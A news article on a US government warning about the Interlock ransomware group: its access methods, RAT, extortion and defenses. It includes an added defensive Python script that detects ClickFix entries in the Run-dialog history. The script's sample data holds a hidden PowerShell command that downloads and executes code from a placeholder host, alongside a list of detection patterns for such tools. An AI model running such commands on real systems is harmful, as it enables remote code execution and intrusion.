The Interlock ransomware attacks are escalating. A joint warning from CISA, the FBI, and the US Department of Homeland Security confirms that the group is aggressively targeting critical sectors across North America and Europe.

The gang is known for double extortion, new remote access trojan (RAT) variants, and advanced social engineering tactics. Its victims include hospitals, government agencies, manufacturers, and schools.


A Fast-Rising Threat

First seen in late 2024, Interlock has rapidly evolved. The group’s most high-profile hit so far was a May 2025 attack on Kettering Health, which:

  • Paralyzed 14 medical centers
  • Canceled thousands of procedures
  • Involved 1 terabyte of exfiltrated data

“These actors are opportunistic and financially motivated,” said CISA. “They disrupt essential services for maximum leverage.”


How Interlock Gains Access

Interlock uses drive-by downloads, posing as fake Chrome or Edge updates. Attackers hide the malware behind spoofed browser alerts on compromised websites.

Key attack methods include:

  • ClickFix: Fake CAPTCHA pages instruct users to open the Run dialog and paste malicious PowerShell commands
  • Impersonation: RATs disguised as IT tools
  • Command & Control (C2) via Cobalt Strike and AnyDesk
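As an added defender-side example, not code from the original article or from any of the sources it cites: a small Python script that parses a constructed export of the RunMRU registry key (where Windows records every command typed into the Run dialog) and flags entries that look like pasted ClickFix commands. The sample export, the value names and the example.invalid URL are all constructed for illustration.

```python
"""Flag ClickFix-style entries in a constructed RunMRU registry export.

ClickFix lures tell the user to press Win+R and paste a PowerShell command.
Windows keeps Run-dialog history under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU,
so that key is a cheap place to check for the technique after the fact.
"""
import re

# Constructed sample in .reg export format: values are single letters,
# data ends in a literal "\1", and MRUList gives recency order.
SAMPLE_EXPORT = r'''
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cab"
"a"="notepad\\1"
"b"="\\\\fileserver\\share\\1"
"c"="powershell -w hidden -c \"iex (iwr https://example.invalid/x)\"\\1"
'''

# Tokens commonly seen in pasted one-liners; two or more together is a hit.
SUSPICIOUS = [
    r"powershell", r"\bpwsh\b", r"\bmshta\b", r"-enc\w*",
    r"-w(indowstyle)?\s+hidden", r"\biex\b", r"invoke-expression",
    r"\biwr\b", r"invoke-webrequest", r"downloadstring", r"\bcurl\b",
    r"\bcertutil\b",
]


def parse_runmru(export_text):
    """Return [(value_name, command), ...] most recent first."""
    values, mru = {}, ""
    for m in re.finditer(r'^"(\w+)"="((?:[^"\\]|\\.)*)"$', export_text, re.M):
        name, data = m.group(1), re.sub(r"\\(.)", r"\1", m.group(2))
        if name == "MRUList":
            mru = data
        else:
            # Drop the trailing "\1" marker Windows appends to each entry.
            values[name] = data[:-2] if data.endswith("\\1") else data
    return [(k, values[k]) for k in mru if k in values]


def flag_clickfix(commands, min_hits=2):
    """Return entries whose command matches at least min_hits tokens."""
    findings = []
    for name, cmd in commands:
        hits = [p for p in SUSPICIOUS if re.search(p, cmd, re.I)]
        if len(hits) >= min_hits:
            findings.append({"value": name, "command": cmd, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in flag_clickfix(parse_runmru(SAMPLE_EXPORT)):
        print(f"RunMRU\\{f['value']}: {f['command']}  <- {f['hits']}")
```

On a live host the same logic applies to the output of `reg export` for that key, or to the equivalent values pulled by an EDR agent.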

New RAT Variant Spotted

The group has upgraded from JavaScript to a new PHP-based RAT, first seen in June 2025. It’s part of a broader Kongtuke FileFix campaign, according to DFIR Report and Proofpoint.

Once inside, the group typically:

  • Installs Lumma Stealer and a keylogger
  • Harvests credentials
  • Moves laterally for deeper access

Encryption, Extortion, and the Onion Blog

Interlock ransomware encrypts both Windows and Linux systems, appending .interlock or .1nt3rlock to affected files.

Victims receive ransom notes directing them to the group’s “Worldwide Secrets Blog” on the dark web. There, they’re told to pay in Bitcoin or risk public exposure of stolen data.

Victims are given 96 hours to comply. Interlock warns that using recovery tools or rebooting systems may cause permanent data loss.


Is Interlock Linked to Rhysida?

Security analysts believe Interlock may be a splinter group of the Russia-linked Rhysida gang. The similarities in encryption tools, RAT behavior, and extortion tactics are striking.

Since January 2025, the group has claimed at least 35 victims, with over half in the last six weeks, according to Cybernews.


What Organizations Should Do

CISA urges immediate action, recommending:

  • Robust EDR solutions
  • Frequent patching
  • Multi-factor authentication
  • Strict network segmentation

Swimlane’s Nick Tausek also emphasizes employee awareness:

“Social engineering is the soft spot. Training users is just as critical as patching firewalls.”


Conclusion

The spike in Interlock ransomware attacks shows how fast today’s threats evolve. With advanced tactics and fast-moving campaigns, organizations must stay ahead with layered defenses, clear procedures, and trained staff. Because in 2025, ransomware doesn’t knock—it clicks.
